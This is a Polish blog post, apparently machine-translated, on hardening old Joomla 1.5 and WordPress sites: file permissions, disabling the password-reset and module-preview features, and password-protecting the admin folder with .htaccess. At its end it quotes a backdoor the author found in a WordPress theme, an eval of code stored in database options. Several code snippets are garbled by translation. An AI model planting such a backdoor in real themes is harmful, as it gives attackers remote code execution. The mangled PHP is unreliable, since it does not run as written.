Cóż, podam też kilka akcji, które zastosowałem w witrynach na przestarzałych już silnikach Joomla 1.5, na które nie ma sensu się przenosić, ale które ciągle psują mój serwer i wykorzystują serwer do wysyłania spamu. Opisane czynności wykonywałem niedawno, więc nie mogę stwierdzić, że strony przestały być infekowane wirusami, ale mam taką nadzieję. Ogólnie trochę próbowałem zwiększyć odporność Joomla 1.5 na pęknięcia.

Jak chronić Joomla 1.5 przed hakerami i wirusami

Jak wspomniałem powyżej, problem polega na tym, że dwie z moich witryn korzystających z Joomla 1.5 są nieustannie atakowane przez hakerów. Można je uznać za porzucone, bo nie dodaję do nich nowych materiałów, ale regularnie generują dochód (z zamieszczania artykułów z Miralinks i Webartex oraz linków z Gogetlinks). Generalnie szkoda je wyrzucać, a przenoszenie na nową wersję silnika to marnotrawstwo (strata czasu i wysiłku).

Pozostaje tylko albo stale monitorować obciążenie serwera, a gdy ono wzrośnie, szukać powłok i innego złośliwego oprogramowania wśród plików silnika, albo w jakiś sposób wzmocnić ochronę. Aby wyszukać złośliwe oprogramowanie, pobieram pliki silnika na swój komputer i skanuję je za pomocą DoctorWeb i Aibolit. Ten pierwszy nie znajduje wszystkiego, ten drugi zbyt często widzi wroga tam, gdzie go nie ma, ale innych skutecznych metod nie znam. Chociaż istnieją również dziesiątki programów, ale jest to wygodniejsze dla wszystkich.

Swoją drogą, scenariusz Aibolit może pracować nie tylko na serwerze, ale także bezpośrednio na komputerze w folderze z pobranymi plikami silnika (tylko nie zapomnij wyłączyć standardowego antywirusa podczas pobierania strony, ponieważ może usunąć część plików, ale nadal będą pozostać na serwerze).

Szczegółowe instrukcje znajdują się w poniższym filmie, ale w skrócie, pobierasz interpreter języka PHP ze strony Microsoftu i instalujesz go. Następnie otwierasz plik skryptu Aibolit o nazwie ai-bolit.php, używając tego właśnie interpretera:

Szybkość skanowania zależy od szybkości Twojego komputera i liczby plików w silniku Twojej witryny. Witryna https:// zajęła mi kilka godzin, ponieważ Aibolit podejrzewa nawet zdjęcia ukrywających wirusy, a mam ich mnóstwo, a skanowanie plików pamięci podręcznej zajmuje dużo czasu. W przypadku witryn opartych na Joomla 1.5 weryfikacja przebiegała znacznie szybciej.

Postanowiłem spędzić dzień szukając sposobów na poprawę bezpieczeństwa witryny. Udało nam się zrobić niewiele, ale i tak lepsze to niż nic. Zacznijmy wzmocnienie ochrony (i zmniejszenie luk) dwóch witryn w Joomla 1.5. Wykonano co następuje:

Jak inaczej chronić Joomla 1.5 przed wirusami i hackami do przesyłania strumieniowego

1. Ponadto „eksperci” twierdzą, że strony na Joomla 1.5 są łamane „raz lub dwa razy” przy użyciu tego dostępnego w silniku (podobno można za jego pośrednictwem zmienić hasło administratora). Nawet jeśli nie korzystasz z rejestracji na swojej stronie i nie wyświetlasz nigdzie linku przywracającego, nie oznacza to, że zakryłeś tę lukę. Po prostu dodaj następujący fragment do adresu URL strony głównej swojej witryny i uzyskaj funkcję, której szukasz: /index.php?option=com_user&view=reset

   Właściwie, aby zamknąć tę lukę (ale nadal nie rozumiem, jak jej używać do hakowania), możesz po prostu usunąć następujący plik:

   /components/com_user/models/reset.php Co prawda po tym żaden z użytkowników zarejestrowanych w Twojej witrynie nie będzie mógł skorzystać z funkcji odzyskiwania hasła, ale dla mnie nie było to ważne, ponieważ nie zapewniono rejestracji.

2. Mówią też, że taka przydatna sztuczka, jak dodanie adresu strony, pozwala także twórcom wirusów i łowcom cudzej własności dostać się do niektórych wrażliwych obszarów Twojej witryny i uczynić ją destrukcyjną lub w inny sposób nadmiernie go nadużywać. Ta rzecz jest ponownie usuwana poprzez edycję jednego z plików silnika. /libraries/Joomla/application/module/helper.php

   Tam musisz usunąć dwa fragmenty kodu lub skomentować je, umieszczając je w /* i */ (kod ten nie zostanie wykonany przez interpreter języka). Pierwszy fragment wygląda tak:

   If(count($result) == 0) ( if(JRequest::getBool("tp")) ( $result = JModuleHelper::getModule("mod_.$position); $result->title = $position; $result->content = $pozycja; $result->position = $pozycja; ) )

   A drugi jest taki:

   If(JRequest::getBool("tp")) ( $attribs["style"] .= "konspekt"; )

   Właściwie po tym zresetujesz pamięć podręczną i spróbujesz wyświetlić pozycje modułów w swoim szablonie, używając tej konstrukcji:

   Https://strona/?tp=1

   Jeśli to nie zadziałało, mam nadzieję, że zamknąłeś tę dziurę.

3. Bardzo często witryny są atakowane nie z zewnątrz, ale od wewnątrz. Trojany i generatory kluczy na Twoim komputerze wiedzą, czego i gdzie szukać, więc nie przechowuj haseł w klientach FTP(istnieje możliwość wykorzystania w tym celu) Jeszcze fajniej jest wyłączyć możliwość dostępu do swojej witryny poprzez FTP, a zamiast tego przesyłane informacje (w tym hasła) są szyfrowane, dzięki czemu ich przechwytywanie nie ma sensu. Szczerze mówiąc, zaniedbuję ostatnią radę ze względu na moją „ciemność”. Istnieje również możliwość skonfigurowania dostępu do Twojej witryny poprzez zwykły FTP tylko z określonego adresu IP (Twój komputer), ale mój dostawca Internetu ma dynamiczny adres IP (zmienia się w określonym zakresie).
4. Doradzaj także silnik nie wyższe niż faktycznie wymagane do jego funkcjonowania. Tak naprawdę bez większego zastanowienia ustawiłem według szablonu: 755 dla folderów i 644 dla plików. Wszystko możesz zrobić używając tej samej Filezilli. Co więcej, prawa te należy zastosować nie tylko do katalogów folderu głównego, ale także do wszystkich katalogów i plików, które się w nich znajdują.

   

   Dla plików w katalogu głównym ustawiłem uprawnienia na 444, a dla katalogów tmp i logs na 705. Oczywiście mogłem to mocniej zacisnąć, ale nie mam w tym dużego doświadczenia, a nie było czasu tracić czasu na eksperymenty. Poza tym wszystko to nie odstraszy poważnie hakerów, ponieważ są rzeczy, które mogą zniweczyć wszystkie nasze wysiłki. Aby to zrobić, użyj takich poleceń:

   Dlatego, aby całkowicie „konkretować” pliki silnika Joomla 1.5 przed włamaniami i włamaniami, konieczne jest zakazanie zmiany praw dostępu do plików i folderów poprzez PHP. Odbywa się to w ustawieniach serwera, ale jeszcze nie wiem jak i gdzie. Jeśli wiesz to wstaw link.

5. Wszystkie powyższe mają na celu zmniejszenie prawdopodobieństwa włamania się do Twojej witryny i penetracji przez powłoki i inne złośliwe oprogramowanie. Jednak podjęte środki ostrożności nie są gwarancją, więc byłoby świetnie na serwerze (na którym znajduje się Twoja witryna Joomla 1.5). To usunie całą negatywność z wyciekającego zła. Jednak osobiście jeszcze tego nie wdrożyłem ze względu na moją „ciemność”. Byłbym wdzięczny za linki do materiałów wyjaśniających ten proces.

Bardzo często strony internetowe psują się po uzyskaniu dostępu do panelu administracyjnego. Oczywiste jest, że jest chroniony hasłem, więc przy użyciu brutalnej siły (inteligentnej selekcji) wiele, nawet pozornie skomplikowanych haseł, zostaje złamanych w jednym lub dwóch. Dlatego Panel administracyjny również wymaga ochrony i lepiej to zrobić nie za pomocą dodatkowych rozszerzeń, ale za pomocą narzędzi serwerowych. Istnieje kilka opcji ochrony. Możesz na przykład zmienić adres URL panelu administracyjnego w taki czy inny sposób, aby haker nie mógł rozpocząć swojego brudnego biznesu.

Inną metodą ochrony, która zostanie szczegółowo opisana poniżej, jest utworzenie dodatkowej bariery na drodze atakującego (żywej osoby lub skryptu). Polega na zabezpieczeniu hasłem katalogu z plikami admin (w Joomli jest to folder administratora, a w WordPressie - wp-admin) za pomocą serwera WWW. Okazuje się, że uzyskując dostęp do panelu administracyjnego, najpierw będziesz musiał podać login i hasło, aby uzyskać dostęp do folderu, a dopiero potem login i hasło, aby uzyskać dostęp do panelu administracyjnego silnika. Co więcej, przełamując pierwszą linię obrony przy użyciu metod brute-force, szkodliwe oprogramowanie nie spowoduje znaczącego dodatkowego obciążenia serwera, co jest dobre.

6. Kolejną bardzo ważną, moim zdaniem, wskazówką dotyczącą zwiększenia bezpieczeństwa Twoich witryn przed włamaniami i infekcjami wirusowymi jest przestrzeganie zasady: jedna witryna - jedno konto hostingowe. Tak, jest drożej, ale dużo bezpieczniej. Jeśli hostujesz je na jednym koncie, wszystkie Twoje witryny będą natychmiast dostępne za pośrednictwem FTP, jeśli złośliwe oprogramowanie uzyska dostęp tylko do jednej z nich. Automatycznie psują witryny i nierozsądne byłoby mieć nadzieję, że skrypty nie pójdą w górę drzewa katalogów. Ponadto bardzo trudno jest leczyć kilka witryn na jednym koncie hostingowym, ponieważ pracując na jednej witrynie traci się z oczu już wyleczoną, która jest jednocześnie infekowana.
7. Nawiasem mówiąc, mogą wyrwać się nie tylko z Twojej własnej witryny, ale także z witryny Twojego sąsiada hostingowego, jeśli właściciele nie zadbali o to, aby wykluczyć taką możliwość. Panel hostingowy (taki jak) również może zostać zhakowany, ale w każdym razie liczba włamań z winy hosta jest znikoma w porównaniu z liczbą włamań spowodowanych nieostrożnością właścicieli witryn.

Jak chronić obszar administracyjny swojej witryny przed włamaniami?

Chcę szczegółowo omówić metodę ochrony, którą sam ostatnio zastosowałem. Polega na zakaz dostępu do folderów, w których znajdują się pliki panelu administracyjnego serwisu. Zakaz ustawiany jest za pomocą wspaniałego pliku .htaccess, który w istocie pozwala na zdalną kontrolę ustawień serwera WWW, na którym zainstalowana jest Twoja witryna. Jednocześnie wie, jak to zrobić wybiórczo.

Wszystkie dyrektywy zapisane w .htaccess będą miały zastosowanie tylko do katalogu, w którym się on znajduje. Chcesz coś zmienić w ustawieniach całej witryny? Następnie umieść plik .htaccess w folderze głównym. Cóż, interesują nas tylko ustawienia dotyczące folderu z plikami administracyjnymi, więc tam je umieścimy. W Joomla będzie to folder administratora, w WordPressie - wp-admin.

Jednak samym .htaccess nie obejdziemy się. Będziesz także musiał użyć .htpasswd, gdzie będzie przechowywany login i hasło dostępu do tego właśnie folderu administracyjnego. Co więcej, hasło nie będzie przechowywane w postaci zwykłego tekstu, ale jako szyfr MD5. Nie będzie możliwe odzyskanie hasła za jego pomocą, ale po wpisaniu poprawnej kombinacji w polu hasła, serwer WWW obliczy kwotę MD5 dla tej kombinacji i porówna ją z tym, co jest zapisane w .htpasswd. Jeśli dane się zgadzają, zostaniesz wpuszczony do obszaru administracyjnego Joomla lub WordPress, ale jeśli nie, nie będziesz mógł.

To wszystko, pozostaje tylko wprowadzić plan w życie. Musisz dodać kilka dyrektyw do .htaccess. Czy wiesz które? Nie wiem. I jakoś będziesz musiał przekonwertować hasło na sekwencję MD5. Problem. Ma jednak dość proste rozwiązanie. Dobrzy ludzie zorganizowali usługę online umożliwiającą generowanie zawartości plików .htaccess i .htpasswd na podstawie utworzonej nazwy użytkownika i hasła. To prawda, będziesz musiał również określić bezwzględną ścieżkę do folderu administracyjnego, ale jest to trywialne.

Poznaj więc wielkiego i strasznego generator ochrony panelu administracyjnego Twojej witryny. Rozumiem, prawda? Wymyślasz lub, co najlepsze, tworzysz na czymś dwie złożone kombinacje liter, cyfr i symboli, po czym wprowadzasz je w dwa górne pola. Tylko nie zapomnij ich zapisać lub umieścić w menedżerze haseł, w przeciwnym razie nie będziesz mógł zalogować się do obszaru administracyjnego i będziesz musiał zacząć robić wszystko, co opisano w tej części od nowa.

Tu i teraz. Czy znasz ten? Nawet jeśli nie wiesz, to nie ma znaczenia. Połącz się ze stroną poprzez FTP, utwórz w jej katalogu głównym plik o dowolnej nazwie (nawet z następującą ścieżką url_path.php) i dodaj do niego prosty kod:

"; echo "Pełna ścieżka do skryptu i jego nazwa: ".$_SERVER["NAZWA_PLIKU_SCRIPT"]."
"; echo "Nazwa skryptu: ".$_SERVER["NAZWA_SCRIPT"]; ?>

Następnie przejdź do przeglądarki i wpisz ten adres URL w pasku adresu (oczywiście z domeną):

Https://site/url_path.php

W rezultacie zobaczysz ścieżkę bezwzględną, która Cię interesowała. Wpisz go w powyższym generatorze plików .htaccess i .htpasswd. Nie zapomnij dodać nazwy folderu administrator lub wp-admin na końcu tej ścieżki, bez końcowego ukośnika. To wszystko, teraz kliknij przycisk „Generuj”.

I jeden po drugim przenieś zawartość plików .htaccess i .htpasswd bezpośrednio do tych samych plików.

Mam nadzieję, że utworzyłeś je już w folderach administrator lub wp-admin (w zależności od silnika, którego używasz)?

Cóż, teraz spróbuj zalogować się do panelu administracyjnego. Pojawi się okno z prośbą o podanie nazwy użytkownika i hasła do serwera WWW? Jest on renderowany inaczej w różnych przeglądarkach, ale w Chrome wygląda to tak:

Jeśli coś nie działa, to „wypal” bezwzględną ścieżkę do .htpasswd zapisaną w pliku .htaccess. W takim przypadku wystarczy ręcznie poprawić to podczas edycji pliku. To wszystko, co chciałem ci dzisiaj powiedzieć. Jeśli chcesz coś skrytykować lub dodać, śmiało.

Wirus w WordPressie?

Po napisaniu tego artykułu odkryłem na moim blogu (https://site) złośliwe oprogramowanie (lub coś, co zostało zainstalowane z pominięciem mojej woli). Chciałem tylko zmienić coś w kodzie i wszedłem do . Na samym dole, tuż przed tagiem Body, uderzyło mnie wywołanie jakiejś nieznanej mi funkcji (bazuję na jej nazwie, ale nie znalazłem nic przydatnego):

Imię wydaje się rozsądne. Warto zauważyć, że około trzy tygodnie wcześniej przypadkowo odkryłem, że mam nową tabelę w bazach danych dwóch moich blogów WordPress (https://site i kolejny). Jego nazwa była po prostu cudowna - wp-config. Ponowne wygooglowanie tej nazwy nie dało niczego przydatnego, ponieważ wszystkie odpowiedzi były powiązane z plikiem wp-config.php o tej samej nazwie.

Tabela ta szybko powiększyła się (do stu megabajtów na https://site) i wpisano do niej adresy stron mojej witryny z różnymi parametrami. Nie rozumiejąc istoty tego procesu, po prostu zburzyłem ten stół i tyle. Swoją drogą mam innego bloga na WordPressie, ale tam nic takiego nie zaobserwowano.

No i tu znalazłem taki „gadający” włącznik do tematu. Postanowiłem sprawdzić, czy nie zostało tam dodane coś zgodnego z linią opisaną powyżej na dole stopki. Okazało się, że zostało dodane. I tak zgrabnie - ani na samej górze, ani na samym dole, ale druga (lub trzecia) funkcja wpisana od góry:

Funkcja wp_custom_page_links_return() ( $opcja = get_option("wp_custom_page_links"); @eval($opcja); ) @eval(get_option("wp_brlinks"));

W tym miejscu wzrok przykuwa cudowna „eval”. Godne uwagi jest to, że Aibolit (opisany powyżej) uznał ten fragment za podejrzany, ale jeszcze się nim nie zająłem, ponieważ ten skrypt już wiele osób podejrzewa o nierzetelność. Poszukałem również w Google informacji o tym kodzie i znalazłem post (niestety, ta domena została teraz zablokowana z powodu braku płatności) opisujący podobny problem. Mój przyjaciel wypuścił te bzdury z nowym motywem, w którym osadzony został kod instalacyjny.

Od wielu lat prowadzę tematy na obu zainfekowanych blogach. Prawdopodobnie istniała jakaś luka w silniku lub , która została szybko (na streamie) wykorzystana przez złoczyńców. Ogólnie rzecz biorąc, sprawdź sam pod kątem braku takich wtrąceń. Data modyfikacji opisywanych plików przypadła moim zdaniem na połowę września tego roku.

Radzę również przyjrzeć się wyborowi z 17 lekcji wideo na temat zabezpieczania stron internetowych w Joomla. Będą one odtwarzane automatycznie jedna po drugiej, a jeśli chcesz, możesz przejść do następnej lekcji za pomocą odpowiedniego przycisku na panelu odtwarzacza lub wybrać żądaną lekcję z rozwijanego menu w lewym górnym rogu okna odtwarzacza:

Miłego oglądania!

Powodzenia! Do zobaczenia wkrótce na stronach bloga

Możesz być zainteresowany

Witryna Joomla zaczęła generować mnóstwo błędów, takich jak - Ścisłe standardy: Metoda niestatyczna JLoader::import () nie powinien być wywoływany statycznie w
Aktualizacja Joomli do najnowszej wersji
Tworzenie mapy witryny Joomla przy użyciu komponentu Xmap
Co to jest Joomla
Grupy użytkowników w Joomla, ustawienia buforowania i problem z wysyłaniem poczty z serwisu
Komponent K2 do tworzenia blogów, katalogów i portali na Joomla - funkcje, instalacja i rusyfikacja
Moduły w Joomla - przeglądanie pozycji, ustawianie i wyświetlanie oraz przypisywanie przyrostków klas
Jak zaktualizować statyczną witrynę HTML do dynamicznej w Joomla
Instalacja WordPressa w szczegółach i obrazkach, logowanie do obszaru administracyjnego WP i zmiana hasła
Wtyczki Joomla - TinyMCE, Load Module, Legacy i inne są instalowane domyślnie